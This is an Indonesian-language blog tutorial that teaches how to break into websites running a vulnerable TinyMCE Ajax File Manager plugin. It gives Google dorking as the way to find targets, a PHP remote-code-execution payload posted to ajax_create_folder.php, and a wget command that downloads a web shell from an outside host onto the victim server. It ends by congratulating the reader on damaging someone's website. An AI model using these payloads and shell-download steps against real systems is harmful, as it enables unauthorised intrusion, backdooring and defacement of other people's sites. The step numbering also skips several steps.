Exploit TinyMCE Ajax File Manager Remote Code Execution
Assalamualaikum Wr.Wb
Baiklah kembali lagi dengan saya Mr.Adewa
Pada kali ini saya akan memberikan Tutorial Exploit TinyMCE Ajax File Manager Remote Code Execution
Sebelum itu kita harus mempersiapkan sesuatu
-Shel
Gunakan shel IndoXploit aja
-Hackbar (COMOT AHH)
Baiklah langsung saja kita mulai
1. Dorking dulu di google (Mana tau dapat yg vuln)
2. Jika sudah masukkan exploitnya [patch]/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php jika vuln akan ada seperti di bawah ini
4. Contrend atau ceklis bagian post data, masukkan exploitnya/command untuk kita lakukan RCE
foo=<?php error_reporting(0);print(system('tes'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>
Command nanti tempat untuk melakukan RCE Atau Remote Code Excution
ls (Berguna untuk menampilkan isi dir
Contoh
foo=<?php error_reporting(0);print(system('ls'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>
6. Kemudian buka tab baru dan masukkan link tadi dan tambahkan inc/data.php
seperti
[patch]/tinymce/plugins/ajaxfilemanager/inc/data.php
Maka perintah ls tadi akan keluar di sana
wget https://linkwebsiteygudahadabackdooornyaataushel.com/namafile.txt -O namashelygingindibuat.php
9. Selamat anda telah berhasil merusak website seseorang. Selanjutnya terserah kalian deh mau di apakan
Jika kurang paham kalian bisa bertanya di bawah ini
Jika kurang paham nonton aja video di bawah ini
Segala sesuatu di tanggung sendiri, blog ini di buat untuk belajar bersama
Wassalamualaikum Wr.Wb